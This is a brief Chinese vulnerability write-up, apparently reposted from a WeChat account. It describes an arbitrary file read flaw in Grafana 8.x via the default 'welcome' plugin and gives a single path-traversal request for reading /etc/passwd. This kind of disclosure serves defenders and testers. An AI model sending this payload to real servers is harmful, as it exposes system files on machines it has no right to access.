圣人之道,吾性自足,不假外求
一、漏洞描述
Grafana存在任意文件读取漏洞,通过默认存在的插件,可构造特殊的请求包读取服务器任意文件
二、漏洞影响
Grafana 8.x
三、漏洞复现
构造请求payload:
/public/plugins/welcome/../../../../../../../../../etc/passwd
漏洞证明
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
原文始发于微信公众号(儒道易行):Grafana plugins 任意文件读取
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论